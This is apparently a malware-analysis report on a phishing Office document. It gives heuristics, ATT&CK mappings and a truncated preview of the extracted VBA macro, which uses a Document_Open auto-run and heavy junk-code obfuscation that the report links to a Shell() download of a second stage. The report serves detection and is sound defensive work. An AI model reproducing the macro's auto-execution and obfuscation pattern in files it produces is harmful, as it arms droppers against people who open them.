MALICIOUS
182
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro is configured to execute a 'Shell()' command, indicating an attempt to download and execute a second-stage payload. The document body explicitly instructs the user to 'Enable Editing' and 'Enable Content', which is a common social engineering tactic to bypass macro security settings.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Macro/content-enable lure medium SE_ENABLE_LUREDocument instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 69369 bytes |
SHA-256: 646074da6e52c2c10c90f4dc256e944483d35f71cbe273d33a4db9bff88651ba |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() Set frm = New frmMain Call Hitler(frm.txtBox.Text) End Sub Attribute VB_Name = "Cgx8sRWwN" Sub Hitler(FBFSEMs1) If 26 < 188 Then ' vseuO Else ' qcWVATBl MsgBox "FFbeR" End If If 26 < 188 Then ' rHAOyR Else ' ePSek4pc Debug.Print "dbkGIPwf" End If Dim QnbKS QnbKS = 95 While QnbKS <= 556 QnbKS = QnbKS + 31 Wend lHpKNBJ = "ILXOw" uT4FtPu = v7p10Hd & QnbKS Dim vJ0Id vJ0Id = 124 While vJ0Id < 658 vJ0Id = vJ0Id + 61 Wend kxUCP = "fC6NhvYW" mUE4uJV = vi1zjN8r & vJ0Id If 36 < 187 Then ' pBvVI0 Else ' vuTcJm Debug.Print "kqdTa" End If If 39 < 145 Then ' Mu45mDga Else ' YCU7ZYkR MsgBox "BJGYOrZE" End If Dim h2StdGh h2StdGh = 210 While h2StdGh < 841 h2StdGh = h2StdGh + 44 Wend zCaQKLt3Z = "m8iy6" HW2YxE0y = Ia4x8iV & h2StdGh If 9915 / 15 = 1243 - 1232 Then Zy4Ebp = "YVoFD3mex" End If einZEHfRh = 56269 tGMhRnx7 = Zy4Ebp & einZEHfRh Dim kImGlL5TF kImGlL5TF = 210 While kImGlL5TF < 841 kImGlL5TF = kImGlL5TF + 44 Wend T0E2RAPuB = 56269 wDgem9NQW = D5Lc4pa & kImGlL5TF If 14 < 160 Then ' BiGOF Else ' De362p Debug.Print "wag4lR2J" End If Dim dNyUK dNyUK = 192 While dNyUK <= 593 dNyUK = dNyUK + 48 Wend vzrg45WjQ = 52677 mJCoVs = V6yUTVB & dNyUK If 8008 / 8 = 1478 - 1465 Then NIlFdZWT = "UQMuy0j" End If SQv0cS = 52677 LgRld9cF4 = NIlFdZWT & SQv0cS If 29928 / 86 = 13680 / 13680 Then xJLGzfH = "yviKdSo" End If aB03PqR = "E15gc" sdxZ9 = xJLGzfH & aB03PqR If 48 < 237 Then ' AF7V9d4 Else ' IGRpw MsgBox "oBIesQH" End If If 29928 / 86 = 13680 / 13680 Then FCgPdEte = "nHJQNU9L" End If m6xHl2YmJ = "NiDLG" fw6trliJ7 = FCgPdEte & m6xHl2YmJ If 28512 / 132 = 2312 - 2311 Then Cfly3wrbJ = "x0ODk" End If QbERAS = "JQFJuO9fy" bpSxfDHsm = Cfly3wrbJ & QbERAS Dim ShFSs ShFSs = 211 While ShFSs < 865 ShFSs = ShFSs + 52 Wend ht8JR45B = 5683 M5F8YHC0X = bNfIop1yd & ShFSs If 15 < 195 Then ' lBLuvnQU Else ' yRmjVJn Debug.Print "cSA2Ua0" End If Dim O3trl4SsO O3trl4SsO = 0 While O3trl4SsO < 660 O3trl4SsO = O3trl4SsO + 54 Wend qQaeTON = 30678 Haw2vc = egLm9FCVZ & O3trl4SsO Dim cU8m5n4qk cU8m5n4qk = 95 While cU8m5n4qk < 298 cU8m5n4qk = cU8m5n4qk + 52 Wend rjV05xZMI = 10216 ZPJAKXx = ykNpD & cU8m5n4qk If 36 < 181 Then ' AD3s5 Else ' cJQre MsgBox "OA5MGBLY" End If If 18900 / 35 = 1498 - 1483 Then ZGVD7pk = "tLkpj1ur" End If ek0boR2W = 54797 awmDC1is = ZGVD7pk & ek0boR2W If 53 < 249 Then ' KNIDt16s Else ' s0AEPi MsgBox "QsbHTDLMi" End If If 27 < 184 Then ' cR1DCXtch Else ' fMXKQjYf MsgBox "azKYexb" End If If 27 < 184 Then ' eY6uhl Else ' m2Xd0Bl Debug.Print "HJmoqH9" End If Dim fxegGX fxegGX = 244 While fxegGX < 445 fxegGX = fxegGX + 27 Wend uoy58p = "Zf94Rv" BOwR4 = YDKxtoJ & fxegGX If 755 * 1 = 31738 / 2267 Then fkXiboWGy = "XHWLt4Qi" End If WPUWdemAu = 45903 O4cPd16 = fkXiboWGy & WPUWdemAu If 755 * 1 = 31738 / 2267 Then v1EVLD = "JufsK3t" End If xJ1km = 45903 AFRH9x = v1EVLD & xJ1km If 3724 / 133 = -4833 + 4836 Then btkjLYnrD = "dZwH5oc" End If iU92C3 = 28948 S9Kp4RX5S = btkjLYnrD & iU92C3 Dim NRypK NRypK = 46 While NRypK <= 515 NRypK = NRypK + 16 Wend Ko6Os = "J5n1Vtrd" n4EMNv9eC = PWmjiqw & NRypK Dim ul3cb ul3cb = 46 While ul3cb < 515 ul3cb = ul3cb + 16 Wend Zeb4HpS = "GB0wvT78" I5Gqu = tygRD & ul3cb Dim mGNhkadL mGNhkadL = 236 While mGNhkadL < 1016 mGNhkadL = mGNhkadL + 24 Wend Uy8DXKls = "UWNondcv" Q60X5k = CnwrDGPIt & mGNhkadL Dim DSBPL DSBPL = 236 While DSBPL <= 1016 DSBPL = DSBPL + 24 Wend Sw6nI = "OWd4qa9p" wjx2FDT = bXP5sN1 & DSBPL If 6384 / 12 = 1037 - 1036 Then XdWipm = "NEqMB6" End If e5Jl37R = "ecpoe4Lab" EaiPKlg8 = XdWipm & e5Jl37R Dim ogjVBdoWC ogjVBdoWC = 236 While ogjVBdoWC < 1016 ogjVBdoWC = ogjVBdoWC + 24 Wend hvl78 = "pAUqiB1d" ijJW6d ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.